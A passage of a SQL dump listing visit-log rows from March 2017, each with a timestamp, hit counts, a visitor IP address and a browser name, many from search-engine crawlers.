90604348,1,1,0,0,'37.55.117.65','chrome'),(96037,1490604718,1,1,0,0,'194.44.17.249','chrome'),(96038,1490604733,1,0,1,0,'66.249.65.180',''),(96039,1490604768,1,1,0,0,'46.119.196.53','chrome'),(96040,1490604865,1,1,0,0,'46.211.159.216','chrome'),(96041,1490605423,1,1,0,0,'91.196.178.163','chrome'),(96042,1490605673,1,1,0,0,'178.93.97.24','chrome'),(96043,1490605702,1,1,0,0,'195.34.74.51','chrome'),(96044,1490605713,1,1,0,0,'141.8.142.15','other'),(96045,1490605845,1,1,0,0,'91.196.178.68','firefox'),(96046,1490606042,1,0,1,0,'66.249.65.180',''),(96047,1490606333,1,1,0,0,'37.73.254.210','chrome'),(96048,1490606549,1,1,0,0,'66.249.65.183','chrome'),(96049,1490607071,1,1,0,0,'91.209.11.236','other'),(96050,1490607286,1,0,1,0,'66.249.65.61',''),(96051,1490607777,1,1,0,0,'94.153.192.46','firefox'),(96052,1490608190,1,1,0,0,'91.196.178.72','chrome'),(96053,1490608690,1,1,0,0,'91.196.177.15','chrome'),(96054,1490608864,1,1,0,0,'91.196.177.46','chrome'),(96055,1490609156,1,1,0,0,'91.196.178.66','firefox'),(96056,1490609702,1,1,0,0,'37.229.226.145','firefox'),(96057,1490609734,1,1,0,0,'95.108.213.34','other'),(96058,1490609770,1,1,0,0,'141.8.142.15','other'),(96059,1490611801,1,1,0,0,'91.234.0.126','chrome'),(96060,1490612485,1,1,0,0,'95.108.213.34','other'),(96061,1490613196,1,0,1,0,'66.249.65.62',''),(96062,1490613253,1,1,0,0,'163.172.69.178','other'),(96063,1490613286,1,1,0,0,'8.29.198.25','other'),(96064,1490613889,1,1,0,0,'51.255.65.75','other'),(96065,1490614544,1,1,0,0,'51.255.65.97','other'),(96066,1490614585,1,1,0,0,'163.172.64.227','other'),(96067,1490615050,1,1,0,0,'83.24.167.142','other'),(96068,1490615052,1,1,0,0,'83.24.167.142','msie'),(96069,1490615829,1,0,1,0,'66.249.65.183',''),(96070,1490615941,1,1,0,0,'37.55.117.65','chrome'),(96071,1490616010,1,1,0,0,'31.129.178.75','firefox'),(96072,1490616025,1,1,0,0,'178.154.200.45','other'),(96073,1490616113,1,1,0,0,'95.134.181.133','chrome'),(96074,1490616227,1,0,1,0,'66.249.65.177',''),(96075,1490616929,1,1,0,0,'194.44.208.90','chrome'),(96076,1490617474,1,1,0,0,'82.207.49.50','chrome'),(96077,1490618174,1,1,0,0,'95.135.129.251','chrome'),(96078,1490618207,1,1,0,0,'91.196.177.46','chrome'),(96079,1490618296,1,1,0,0,'40.77.167.17','other'),(96080,1490618939,1,0,1,0,'207.46.13.110',''),(96081,1490618986,1,1,0,0,'51.255.65.95','other'),(96082,1490619015,1,1,0,0,'51.255.65.4','other'),(96083,1490619051,1,1,0,0,'91.196.178.65','firefox'),(96084,1490619363,1,1,0,0,'66.249.65.180','chrome'),(96085,1490619914,2,0,2,0,'66.249.65.177',''),(96086,1490620617,1,1,0,0,'95.108.213.34','other'),(96087,1490621185,1,1,0,0,'66.249.65.183','chrome'),(96088,1490621186,3,1,2,0,'66.249.65.61',''),(96089,1490621291,1,1,0,0,'207.46.13.110','other'),(96090,1490621351,3,0,3,0,'66.249.65.62',''),(96091,1490621445,2,0,2,0,'66.249.65.180',''),(96092,1490622208,1,0,1,0,'66.249.65.60',''),(96093,1490622657,1,0,1,0,'66.249.65.180',''),(96094,1490624065,1,1,0,0,'194.50.51.247','chrome'),(96095,1490624139,1,1,0,0,'8.29.198.25','other'),(96096,1490624218,1,1,0,0,'193.194.127.217','firefox'),(96097,1490624441,1,1,0,0,'163.172.64.199','other'),(96098,1490624579,1,1,0,0,'82.207.91.234','firefox'),(96099,1490625016,1,0,1,0,'66.249.65.62',''),(96100,1490625073,2,0,2,0,'66.249.65.183',''),(96101,1490625296,1,1,0,0,'79.140.0.69','chrome'),(96102,1490625577,2,0,2,0,'66.249.65.61',''),(96103,1490625644,1,1,0,0,'66.249.65.62','chrome'),(96104,1490626579,2,0,2,0,'66.249.65.62',''),(96105,1490626785,1,0,1,0,'66.249.65.60',''),(96106,1490627119,2,0,2,0,'66.249.65.61',''),(96107,1490627573,1,0,1,0,'66.249.65.62',''),(96108,1490627574,1,0,1,0,'66.249.65.183',''),(96109,1490627946,2,1,1,0,'66.249.65.60',''),(96110,1490627947,1,1,0,0,'66.249.65.180','chrome'),(96111,1490628117,1,1,0,0,'51.255.65.17','other'),(96112,1490628444,1,0,1,0,'66.249.65.61',''),(96113,1490628985,1,0,1,0,'66.249.65.177',''),(96114,1490629202,1,1,0,0,'51.255.65.44','other'),(96115,1490629496,1,0,1,0,'66.249.65.180',''),(96116,1490630359,1,0,1,0,'66.249.65.183',''),(96117,1490630408,2,0,2,0,'66.249.65.177',''),(96118,1490631864,1,1,0,0,'180.76.15.8','other'),(96119,1490632546,1,1,0,0,'51.255.65.49','other'),(96120,1490632906,1,0,1,0,'66.249.65.180',''),(96121,1490633196,1,0,1,0,'66.249.65.62',''),(96122,1490633478,1,1,0,0,'66.249.65.177','chrome'),(96123,1490633576,1,1,0,0,'178.154.149.3','other'),(96124,1490633747,1,1,0,0,'37.54.18.208','firefox'),(96125,1490634569,1,0,1,0,'66.249.65.61',''),(96126,1490634982,1,1,0,0,'8.29.198.26','other'),(96127,1490634996,1,1,0,0,'163.172.64.238','other'),(96128,1490635524,1,0,1,0,'66.249.65.61',''),(96129,1490635710,2,0,2,0,'66.249.65.177',''),(96130,1490635835,1,0,1,0,'66.249.65.180',''),(96131,1490636320,1,0,1,0,'66.249.65.183',''),(96132,1490636441,2,0,2,0,'66.249.65.61',''),(96133,1490637021,1,1,0,0,'37.54.18.208','firefox'),(96134,1490637807,1,1,0,0,'92.112.231.81','chrome'),(96135,1490638178,1,1,0,0,'66.249.65.177','chrome'),(96136,1490638800,3,0,3,0,'66.249.65.180',''),(96137,1490638869,1,1,0,0,'95.108.213.34','other'),(96138,1490639293,1,0,1,0,'66.249.65.177',''),(96139,1490639616,1,1,0,0,'176.194.47.140','msie'),(96140,1490639742,1,1,0,0,'164.132.161.80','other'),(96141,1490639919,1,0,1,0,'66.249.65.180',''),(96142,1490639943,1,1,0,0,'95.108.213.34','other'),(96143,1490640144,1,1,0,0,'51.255.65.19','other'),(96144,1490640344,1,0,1,0,'66.249.65.62',''),(96145,1490640683,1,1,0,0,'91.196.178.162','chrome'),(96146,1490641197,1,0,1,0,'66.249.65.183',''),(96147,1490641495,1,1,0,0,'66.249.65.183','chrome'),(96148,1490641806,1,1,0,0,'37.54.18.208','firefox'),(96149,1490643271,1,0,1,0,'66.249.65.62',''),(96150,1490643935,1,0,1,0,'66.249.65.60',''),(96151,1490644082,1,1,0,0,'51.255.65.9','other'),(96152,1490644802,1,0,1,0,'66.249.65.177',''),(96153,1490645587,1,0,1,0,'66.249.65.61',''),(96154,1490645813,1,1,0,0,'8.29.198.25','other'),(96155,1490646012,1,0,1,0,'66.249.65.62',''),(96156,1490646313,1,0,1,0,'66.249.65.60',''),(96157,1490646396,1,0,1,0,'66.249.65.177',''),(96158,1490646608,1,1,0,0,'51.255.65.43','other'),(96159,1490647269,1,1,0,0,'95.76.18.235','firefox'),(96160,1490647838,1,1,0,0,'66.249.65.180','chrome'),(96161,1490647892,1,0,1,0,'66.249.65.60',''),(96162,1490650013,1,0,1,0,'66.249.65.177',''),(96163,1490650221,1,0,1,0,'66.249.65.180',''),(96164,1490650303,2,0,2,0,'66.249.65.61',''),(96165,1490650408,1,0,1,0,'66.249.65.62',''),(96166,1490652539,1,1,0,0,'51.255.65.18','other'),(96167,1490652785,1,1,0,0,'163.172.64.251','other'),(96169,1490653001,1,1,0,0,'178.202.133.106','other'),(96170,1490653297,3,0,3,0,'66.249.65.183',''),(96171,1490653650,1,0,1,0,'66.249.65.180',''),(96172,1490654520,1,1,0,0,'164.132.161.12','other'),(96173,1490654532,1,1,0,0,'46.211.155.223','chrome'),(96174,1490654710,1,1,0,0,'164.132.161.14','other'),(96175,1490655216,1,0,1,0,'66.249.65.180',''),(96176,1490655594,2,0,2,0,'66.249.65.177',''),(96177,1490655801,1,0,1,0,'66.249.65.62',''),(96178,1490656305,1,1,0,0,'40.77.167.17','other'),(96179,1490656499,1,0,1,0,'66.249.65.60',''),(96180,1490656646,1,1,0,0,'8.29.198.27','other'),(96181,1490656672,1,0,1,0,'66.249.65.180',''),(96182,1490657416,1,0,1,0,'66.249.65.183',''),(96183,1490658104,1,0,1,0,'66.249.65.180',''),(96184,1490658130,2,1,1,0,'66.249.65.177',''),(96185,1490658831,1,1,0,0,'66.249.65.62','chrome'),(96186,1490658879,1,1,0,0,'164.132.161.71','other'),(96187,1490658887,3,0,3,0,'66.249.65.61',''),(96188,1490658953,3,2,1,0,'66.249.65.177',''),(96189,1490659779,1,1,0,0,'66.249.65.61','chrome'),(96190,1490659787,5,0,5,0,'66.249.65.60',''),(96191,1490659863,1,0,1,0,'66.249.65.180',''),(96192,1490659864,1,0,1,0,'66.249.65.177',''),(96193,1490660568,1,1,0,0,'164.132.161.96','other'),(96194,1490660949,1,0,1,0,'66.249.65.60',''),(96195,1490661334,1,1,0,0,'180.76.15.23','other'),(96196,1490662806,1,1,0,0,'46.48.13.161','chrome'),(96197,1490662885,2,2,0,0,'207.46.13.110','other'),(96198,1490663671,1,0,1,0,'66.249.65.60',''),(96199,1490663929,3,3,0,0,'207.46.13.110','other'),(96200,1490664811,1,1,0,0,'91.209.11.236','other'),(96201,1490664845,1,0,1,0,'66.249.65.61',''),(96202,1490664858,1,1,0,0,'51.255.65.8','other'),(96203,1490664912,1,1,0,0,'207.46.13.110','other'),(96204,1490664980,1,1,0,0,'163.172.64.189','other'),(96205,1490665000,1,0,1,0,'66.249.65.60',''),(96206,1490665510,1,1,0,0,'180.76.15.140','other'),(96207,1490666232,1,0,1,0,'66.249.65.60',''),(96208,1490667484,1,1,0,0,'8.29.198.25','other'),(96209,1490667511,2,2,0,0,'66.249.65.180','chrome'),(96210,1490667797,1,0,1,0,'66.249.65.183',''),(96211,1490668009,2,2,0,0,'207.46.13.110','other'),(96212,1490668059,1,1,0,0,'66.249.65.62','chrome'),(96213,1490668412,1,0,1,0,'66.249.66.87',''),(96214,1490668948,1,1,0,0,'40.77.167.67','other'),(96215,1490668958,1,1,0,0,'163.172.64.184','other'),(96216,1490669261,1,0,1,0,'66.249.66.180',''),(96217,1490669514,1,0,1,0,'66.249.66.87',''),(96218,1490669666,3,3,0,0,'207.46.13.110','other'),(96219,1490670017,1,1,0,0,'95.108.213.34','other'),(96220,1490670018,1,1,0,0,'141.8.142.15','other'),(96221,1490670417,1,1,0,0,'180.76.15.27','other'),(96222,1490670528,1,0,1,0,'66.249.66.81',''),(96223,1490670875,1,1,0,0,'217.69.133.3','other'),(96224,1490670913,1,0,1,0,'66.249.66.84',''),(96225,1490671623,1,1,0,0,'163.172.64.230','other'),(96226,1490672226,1,1,0,0,'95.108.179.15','other'),(96227,1490672233,1,1,0,0,'141.8.142.154','other'),(96228,1490672272,1,1,0,0,'51.255.65.66','other'),(96229,1490672290,1,1,0,0,'82.145.222.112','other'),(96230,1490672773,4,4,0,0,'207.46.13.110','other'),(96231,1490672805,1,0,1,0,'40.77.167.72',''),(96232,1490674735,1,1,0,0,'46.48.13.161','chrome'),(96233,1490675679,1,1,0,0,'141.8.142.164','other'),(96234,1490675727,2,0,2,0,'66.249.66.183',''),(96235,1490675766,1,1,0,0,'164.132.161.52','other'),(96236,1490675995,1,1,0,0,'91.196.178.66','firefox'),(96237,1490676090,1,1,0,0,'164.132.161.93','other'),(96238,1490676233,1,1,0,0,'91.196.178.67','firefox'),(96239,1490676609,1,0,1,0,'66.249.66.81',''),(96240,1490676902,1,0,1,0,'66.249.66.183',''),(96241,1490677274,1,1,0,0,'66.249.66.81','chrome'),(96242,1490677582,1,1,0,0,'51.255.65.3','other'),(96243,1490678013,1,1,0,0,'66.249.66.84','chrome'),(96244,1490678016,1,1,0,0,'66.249.66.177','chrome'),(96245,1490678039,1,0,1,0,'66.249.66.171',''),(96246,1490678139,1,1,0,0,'164.132.161.89','other'),(96247,1490678343,1,1,0,0,'8.29.198.26','other'),(96249,1490678597,1,0,1,0,'66.249.66.183',''),(96250,1490678852,1,1,0,0,'164.132.161.97','other'),(96251,1490678997,1,1,0,0,'91.196.178.69','chrome'),(96252,1490679089,1,1,0,0,'164.132.161.29','other'),(96253,1490679177,1,1,0,0,'91.196.178.66','firefox'),(96254,1490679561,1,1,0,0,'91.196.178.70','chrome'),(96255,1490679602,2,0,2,0,'66.249.66.180',''),(96256,1490679670,2,0,2,0,'66.249.66.84',''),(96257,1490679798,1,0,1,0,'66.249.66.87',''),(96258,1490680270,1,0,1,0,'66.249.66.177',''),(96259,1490680805,1,1,0,0,'91.196.177.46','firefox'),(96260,1490681149,1,1,0,0,'178.92.171.95','chrome'),(96261,1490681686,1,1,0,0,'51.255.65.86','other'),(96262,1490682516,1,1,0,0,'66.249.66.81','chrome'),(96263,1490682517,1,1,0,0,'66.249.66.180','chrome'),(96264,1490682616,2,2,0,0,'91.196.178.70','firefox'),(96265,1490682770,3,3,0,0,'40.77.167.72','other'),(96266,1490683303,1,1,0,0,'195.5.33.96','chrome'),(96267,1490683359,1,1,0,0,'78.111.187.180','chrome'),(96268,1490683389,1,1,0,0,'212.111.198.207','chrome'),(96269,1490683511,1,1,0,0,'91.196.178.134','firefox'),(96270,1490683641,1,1,0,0,'51.255.65.71','other'),(96271,1490683715,1,1,0,0,'164.132.161.64','other'),(96272,1490683844,1,0,1,0,'66.249.66.87',''),(96273,1490684501,1,1,0,0,'91.196.178.70','firefox'),(96274,1490685649,1,1,0,0,'163.172.64.239','other'),(96275,1490685979,1,1,0,0,'164.132.161.29','other'),(96276,1490686123,1,1,0,0,'91.196.122.186','chrome'),(96277,1490686452,1,1,0,0,'91.196.177.15','chrome'),(96278,1490686585,1,0,1,0,'66.249.66.180',''),(96279,1490686861,1,1,0,0,'91.196.179.134','chrome'),(96280,1490688235,1,1,0,0,'163.172.64.222','other'),(96281,1490688689,1,1,0,0,'91.196.178.65','chrome'),(96282,1490688778,1,1,0,0,'194.44.60.5','firefox'),(96283,1490689173,1,1,0,0,'8.29.198.27','other'),(96284,1490689190,1,1,0,0,'51.255.65.13','other'),(96285,1490689195,1,1,0,0,'91.196.178.71','chrome'),(96286,1490689750,1,1,0,0,'91.196.178.70','firefox'),(96287,1490690179,1,1,0,0,'91.196.178.70','chrome'),(96288,1490690518,2,2,0,0,'91.196.177.26','chrome'),(96289,1490691175,1,0,1,0,'66.249.66.180',''),(96290,1490691208,1,1,0,0,'91.196.178.65','chrome'),(96291,1490691336,1,1,0,0,'195.230.130.104','chrome'),(96292,1490691435,1,1,0,0,'163.172.64.181','other'),(96293,1490691827,1,1,0,0,'66.249.66.177','chrome'),(96294,1490691828,1,1,0,0,'66.249.66.87','chrome'),(96295,1490691920,1,1,0,0,'51.255.65.22','other'),(96296,1490692248,1,1,0,0,'164.132.161.32','other'),(96297,1490692484,1,0,1,0,'66.249.66.183',''),(96298,1490692645,1,1,0,0,'66.102.9.35','chrome'),(96299,1490692752,1,1,0,0,'164.132.161.23','other'),(96300,1490692827,2,0,2,0,'66.249.66.84',''),(96301,1490693116,1,0,1,0,'66.249.66.87',''),(96302,1490693262,1,0,1,0,'66.249.66.180',''),(96303,1490694118,1,0,1,0,'66.249.66.177',''),(96304,1490694138,1,1,0,0,'77.222.134.100','firefox'),(96305,1490694164,1,1,0,0,'164.132.161.43','other'),(96306,1490694996,1,1,0,0,'66.249.66.177','chrome'),(96307,1490695063,1,1,0,0,'91.196.178.72','firefox'),(96308,1490695240,1,0,1,0,'66.249.66.87',''),(96309,1490695246,1,0,1,0,'66.249.66.81',''),(96310,1490695278,6,6,0,0,'91.209.51.22','other'),(96311,1490696145,1,1,0,0,'51.255.65.30','other'),(96312,1490696147,1,1,0,0,'164.132.161.29','other'),(96313,1490697292,1,1,0,0,'66.249.66.81','chrome'),(96314,1490697831,1,0,1,0,'66.249.66.177',''),(96315,1490698325,2,0,2,0,'66.249.66.81',''),(96316,1490698355,1,0,1,0,'66.249.66.84',''),(96317,1490698817,1,1,0,0,'91.196.178.167','chrome'),(96318,1490698855,1,1,0,0,'91.192.135.241','firefox'),(96319,1490699267,2,0,2,0,'66.249.66.81',''),(96320,1490699993,1,0,1,0,'66.249.66.177',''),(96321,1490700016,1,1,0,0,'8.29.198.27','other'),(96322,1490700432,1,0,1,0,'66.249.66.81',''),(96323,1490700502,1,0,1,0,'66.249.66.84',''),(96324,1490700845,2,0,2,0,'66.249.66.183',''),(96325,1490701161,1,0,1,0,'66.249.66.87',''),(96326,1490701202,1,1,0,0,'163.172.64.232','other'),(96327,1490702028,1,1,0,0,'91.196.178.65','chrome'),(96328,1490702127,1,1,0,0,'91.196.177.26','chrome'),(96329,1490702676,1,0,1,0,'66.249.66.87',''),(96330,1490702742,1,1,0,0,'51.255.65.62','other'),(96331,1490703069,2,0,2,0,'66.249.66.81',''),(96332,1490703173,1,1,0,0,'66.249.66.183','chrome'),(96333,1490703185,1,1,0,0,'195.49.151.99','chrome'),(96334,1490703212,2,1,1,0,'66.249.66.87',''),(96335,1490703582,1,1,0,0,'141.8.142.15','other'),(96336,1490703902,1,0,1,0,'66.249.66.84',''),(96337,1490704201,1,1,0,0,'91.196.178.130','firefox'),(96338,1490704522,1,0,1,0,'66.249.66.177',''),(96339,1490704663,1,1,0,0,'95.108.213.34','other'),(96340,1490705031,1,1,0,0,'91.196.178.163','firefox'),(96341,1490705146,1,1,0,0,'91.196.178.65','firefox'),(96342,1490705508,1,1,0,0,'178.95.67.199','chrome'),(96343,1490705521,1,1,0,0,'95.108.179.15','other'),(96344,1490705728,1,1,0,0,'93.74.96.198','chrome'),(96345,1490705837,1,0,1,0,'66.249.66.180',''),(96346,1490706125,1,1,0,0,'91.196.178.168','chrome'),(96347,1490706273,1,1,0,0,'91.196.178.130','firefox'),(96348,1490706435,1,0,1,0,'66.249.66.177',''),(96349,1490707218,1,1,0,0,'77.37.222.252','msie'),(96350,1490707288,1,0,1,0,'66.249.66.87',''),(96351,1490707883,1,1,0,0,'91.196.179.134','chrome'),(96352,1490708143,1,0,1,0,'66.249.66.180',''),(96353,1490708236,1,1,0,0,'91.196.178.130','firefox'),(96354,1490708625,1,1,0,0,'94.179.101.90','chrome'),(96355,1490708708,1,1,0,0,'46.200.118.23','firefox'),(96356,1490708962,1,1,0,0,'91.196.178.69','msie'),(96357,1490709043,2,1,1,0,'66.249.66.87',''),(96358,1490709074,1,1,0,0,'178.94.38.201','chrome'),(96359,1490709086,2,1,1,0,'66.249.66.180',''),(96360,1490709128,1,0,1,0,'66.249.66.81',''),(96361,1490709208,1,1,0,0,'91.196.178.72','firefox'),(96362,1490709734,1,1,0,0,'91.196.178.65','firefox'),(96363,1490710021,1,0,1,0,'66.249.66.183',''),(96364,1490710057,1,1,0,0,'91.196.177.46','firefox'),(96365,1490710109,1,0,1,0,'66.249.66.84',''),(96366,1490710321,1,1,0,0,'176.195.99.30','msie'),(96367,1490710333,1,1,0,0,'46.200.118.23','firefox'),(96368,1490710494,2,2,0,0,'94.178.127.233','other'),(96369,1490710640,1,1,0,0,'91.196.178.168','chrome'),(96370,1490710651,1,1,0,0,'176.15.237.212','msie'),(96371,1490710859,1,1,0,0,'8.29.198.26','other'),(96372,1490711046,1,1,0,0,'91.209.11.236','other'),(96373,1490711834,1,1,0,0,'163.172.64.245','other'),(96374,1490712207,1,1,0,0,'51.255.65.32','other'),(96375,1490712926,1,0,1,0,'66.249.66.177',''),(96376,1490713042,1,1,0,0,'164.132.161.24','other'),(96377,1490714001,1,0,1,0,'66.249.66.183',''),(96378,1490714038,2,0,2,0,'66.249.66.177',''),(96379,1490714166,1,1,0,0,'66.249.93.156','chrome'),(96380,1490715092,1,0,1,0,'66.249.66.81',''),(96381,1490715180,1,0,1,0,'66.249.66.177',''),(96382,1490715323,1,1,0,0,'66.249.66.180','chrome'),(96383,1490715362,2,1,1,0,'66.249.66.84',''),(96384,1490715874,1,1,0,0,'66.249.66.81','chrome'),(96385,1490717039,1,1,0,0,'163.172.68.121','other'),(96386,1490717178,1,1,0,0,'164.132.161.19','other'),(96387,1490717668,1,1,0,0,'91.196.178.33','firefox'),(96388,1490718407,1,1,0,0,'51.255.65.66','other'),(96389,1490718547,1,0,1,0,'66.249.66.177',''),(96390,1490718789,1,0,1,0,'66.249.66.87',''),(96391,1490718927,1,0,1,0,'66.249.66.180',''),(96392,1490719113,1,1,0,0,'207.46.13.1','other'),(96393,1490719702,1,1,0,0,'163.172.64.181','other'),(96394,1490719796,1,0,1,0,'66.249.66.177',''),(96395,1490720353,1,1,0,0,'66.249.66.183','chrome'),(96396,1490721699,1,1,0,0,'8.29.198.25','other'),(96397,1490722233,1,1,0,0,'92.113.191.87','firefox'),(96398,1490722249,1,1,0,0,'163.172.64.238','other'),(96399,1490722483,1,1,0,0,'95.108.213.34','other'),(96400,1490722570,1,1,0,0,'164.132.161.75','other'),(96401,1490723964,1,1,0,0,'66.249.66.177','chrome'),(96402,1490723990,1,1,0,0,'66.249.66.81','chrome'),(96403,1490724924,1,0,1,0,'66.249.66.84',''),(96404,1490725019,1,1,0,0,'164.132.161.15','other'),(96405,1490725157,1,0,1,0,'207.46.13.158',''),(96406,1490725204,1,1,0,0,'163.172.68.127','other'),(96407,1490725375,1,1,0,0,'207.46.13.1','other'),(96408,1490725587,1,1,0,0,'163.172.64.188','other'),(96409,1490725624,1,1,0,0,'91.196.178.161','chrome'),(96410,1490725671,1,1,0,0,'163.172.64.216','other'),(96411,1490726289,1,0,1,0,'66.249.66.87',''),(96412,1490727086,1,1,0,0,'91.196.178.97','chrome'),(96413,1490727104,1,1,0,0,'141.8.142.15','other'),(96414,1490727112,1,0,1,0,'66.249.66.183',''),(96415,1490727185,1,0,1,0,'66.249.66.180',''),(96416,1490727221,1,0,1,0,'66.249.66.177',''),(96417,1490728227,1,0,1,0,'66.249.66.99',''),(96418,1490728709,3,0,3,0,'66.249.66.81',''),(96419,1490728741,1,1,0,0,'51.255.65.56','other'),(96420,1490728867,1,1,0,0,'51.255.65.16','other'),(96421,1490729757,1,1,0,0,'66.249.66.180','chrome'),(96422,1490729786,1,1,0,0,'66.249.76.30','chrome'),(96423,1490730636,1,0,1,0,'66.249.76.108',''),(96424,1490730995,1,1,0,0,'207.46.13.1','other'),(96425,1490731890,1,1,0,0,'164.132.161.60','other'),(96426,1490732007,1,0,1,0,'66.249.76.30',''),(96427,1490732534,1,1,0,0,'8.29.198.25','other'),(96428,1490732819,1,1,0,0,'164.132.161.11','other'),(96429,1490733210,1,0,1,0,'157.55.39.59',''),(96430,1490733937,1,1,0,0,'130.180.210.119','chrome'),(96431,1490733956,1,1,0,0,'95.108.179.15','other'),(96432,1490734117,1,1,0,0,'5.255.253.63','other'),(96433,1490734157,1,0,1,0,'66.249.66.99',''),(96434,1490734384,1,1,0,0,'93.171.243.18','chrome'),(96435,1490734983,1,1,0,0,'163.172.64.181','other'),(96436,1490735050,1,0,1,0,'66.249.66.183',''),(96437,1490735086,2,2,0,0,'82.193.102.149','other'),(96438,1490735747,1,1,0,0,'163.172.73.28','other'),(96439,1490735792,1,1,0,0,'95.108.179.15','other'),(96440,1490736900,1,0,1,0,'66.249.66.81',''),(96441,1490737128,1,1,0,0,'207.46.13.158','other'),(96442,1490737681,1,1,0,0,'163.172.64.245','other'),(96443,1490738232,1,1,0,0,'163.172.71.29','other'),(96444,1490738744,1,1,0,0,'164.132.161.92','other'),(96445,1490738767,1,1,0,0,'51.255.65.49','other'),(96446,1490740270,1,0,1,0,'66.249.76.108',''),(96447,1490741811,1,1,0,0,'207.46.13.1','other'),(96448,1490742218,1,0,1,0,'66.249.76.108',''),(96449,1490742230,1,1,0,0,'164.132.161.20','other'),(96450,1490742367,1,1,0,0,'51.255.65.84','other'),(96451,1490742924,1,0,1,0,'66.249.66.177',''),(96452,1490743160,78,2,76,0,'198.204.224.58',''),(96453,1490743367,1,1,0,0,'8.29.198.27','other'),(96454,1490743937,1,0,1,0,'66.249.76.109',''),(96455,1490744072,68,0,68,0,'198.204.224.58',''),(96456,1490744180,1,0,1,0,'66.249.76.111',''),(96457,1490744257,1,0,1,0,'157.55.39.59',''),(96458,1490744345,1,0,1,0,'66.249.66.183',''),(96459,1490744371,1,1,0,0,'164.132.161.93','other'),(96460,1490744627,71,71,0,0,'198.204.224.58','msie'),(96461,1490744761,2,0,2,0,'66.249.76.30',''),(96462,1490744928,5,5,0,0,'198.204.224.58','firefox'),(96463,1490745845,1,1,0,0,'207.46.13.110','other'),(96464,1490746390,1,0,1,0,'207.46.13.158',''),(96465,1490747031,1,1,0,0,'164.132.161.75','other'),(96466,1490747355,2,2,0,0,'66.249.76.107','chrome'),(96467,1490747683,1,1,0,0,'164.132.161.24','other'),(96468,1490748112,1,1,0,0,'163.172.64.192','other'),(96469,1490748625,1,0,1,0,'66.249.66.180',''),(96470,1490749018,1,1,0,0,'51.255.65.17','other'),(96471,1490749189,1,1,0,0,'180.76.15.160','other'),(96472,1490749229,1,0,1,0,'66.249.66.87',''),(96473,1490750092,1,0,1,0,'66.249.76.28',''),(96474,1490750581,1,0,1,0,'66.249.76.30',''),(96475,1490751865,1,0,1,0,'66.249.66.87',''),(96476,1490752521,1,1,0,0,'46.48.13.161','chrome'),(96477,1490754199,1,1,0,0,'8.29.198.25','other'),(96478,1490756104,1,0,1,0,'66.249.66.84',''),(96479,1490756375,1,0,1,0,'66.249.76.109',''),(96480,1490756892,1,1,0,0,'157.55.39.59','other'),(96481,1490757749,1,1,0,0,'180.76.15.14','other'),(96482,1490758563,1,1,0,0,'207.46.13.110','other'),(96483,1490758605,1,1,0,0,'157.55.39.59','other'),(96484,1490758627,1,1,0,0,'66.249.76.109','chrome'),(96485,1490758936,1,0,1,0,'66.249.76.30',''),(96486,1490759560,1,0,1,0,'66.249.76.108',''),(96487,1490759561,2,2,0,0,'157.55.39.59','other'),(96488,1490760207,1,1,0,0,'164.132.161.83','other'),(96489,1490761048,1,1,0,0,'157.55.39.59','other'),(96490,1490761780,1,0,1,0,'66.249.76.28',''),(96491,1490762225,1,1,0,0,'91.196.178.67','firefox'),(96492,1490762475,1,1,0,0,'66.249.66.177','chrome'),(96493,1490762559,1,1,0,0,'51.255.65.10','other'),(96494,1490762935,1,0,1,0,'66.249.76.28',''),(96495,1490762969,1,1,0,0,'157.55.39.59','other'),(96496,1490763453,1,0,1,0,'207.46.13.110',''),(96497,1490763455,1,1,0,0,'207.46.13.110','other'),(96498,1490763978,2,1,1,0,'66.249.76.108',''),(96499,1490764023,1,1,0,0,'66.249.76.30','chrome'),(96500,1490764440,1,0,1,0,'66.249.76.109',''),(96501,1490765037,1,1,0,0,'8.29.198.26','other'),(96502,1490765486,1,0,1,0,'66.249.76.107',''),(96503,1490765661,1,0,1,0,'66.249.66.84',''),(96504,1490765878,1,1,0,0,'40.77.167.18','other'),(96505,1490766345,1,0,1,0,'66.249.76.28',''),(96506,1490766402,1,1,0,0,'164.132.161.67','other'),(96507,1490766737,1,1,0,0,'91.196.178.69','chrome'),(96508,1490767129,1,0,1,0,'66.249.76.108',''),(96509,1490767879,1,0,1,0,'66.249.76.28',''),(96510,1490767897,1,1,0,0,'66.249.93.157','chrome'),(96511,1490768310,1,1,0,0,'51.255.65.55','other'),(96512,1490769270,2,2,0,0,'207.46.13.158','other'),(96513,1490769274,1,1,0,0,'207.46.13.110','other'),(96514,1490769281,2,2,0,0,'40.77.167.33','other'),(96515,1490769324,2,2,0,0,'40.77.167.18','other'),(96516,1490769367,1,1,0,0,'188.163.5.58','chrome'),(96517,1490769539,1,1,0,0,'164.132.161.75','other'),(96518,1490770229,1,1,0,0,'141.8.142.15','other'),(96519,1490770438,1,1,0,0,'207.46.13.158','other'),(96520,1490770475,1,1,0,0,'91.196.178.65','chrome'),(96521,1490770895,1,1,0,0,'93.170.149.97','chrome'),(96522,1490771057,1,1,0,0,'51.255.65.45','other'),(96523,1490771301,1,1,0,0,'141.8.142.15','other'),(96524,1490771604,1,1,0,0,'195.64.190.1','chrome'),(96525,1490771610,1,1,0,0,'95.108.213.34','other'),(96526,1490771659,1,1,0,0,'164.132.161.61','other'),(96527,1490772048,1,1,0,0,'52.86.176.3','other'),(96528,1490772333,1,1,0,0,'95.134.21.194','chrome'),(96529,1490772491,1,1,0,0,'78.111.190.202','firefox'),(96530,1490773172,1,0,1,0,'40.77.167.18',''),(96531,1490773205,1,1,0,0,'91.196.178.129','firefox'),(96532,1490773739,1,1,0,0,'91.196.177.147','firefox'),(96533,1490773911,1,1,0,0,'77.52.177.114','chrome'),(96534,1490774120,1,1,0,0,'66.102.9.35','chrome'),(96535,1490774570,1,1,0,0,'164.132.161.7','other'),(96536,1490774744,1,1,0,0,'180.76.15.19','other'),(96537,1490774748,1,1,0,0,'91.196.179.33','firefox'),(96538,1490774941,1,1,0,0,'91.196.178.162','chrome'),(96539,1490775318,1,1,0,0,'51.255.65.85','other'),(96540,1490775750,18,18,0,0,'151.80.44.115','other'),(96541,1490775872,1,1,0,0,'8.29.198.27','other'),(96542,1490775885,1,1,0,0,'178.95.55.98','firefox'),(96543,1490776189,1,1,0,0,'217.23.11.65','chrome'),(96544,1490776657,1,1,0,0,'91.196.178.65','chrome'),(96545,1490776739,1,1,0,0,'91.124.235.13','chrome'),(96546,1490776744,1,1,0,0,'63.243.252.66','other'),(96547,1490777201,1,1,0,0,'164.132.161.75','other'),(96548,1490777774,1,0,1,0,'66.249.76.108',''),(96549,1490777987,1,1,0,0,'217.23.11.65','chrome'),(96550,1490778138,1,0,1,0,'66.249.66.81',''),(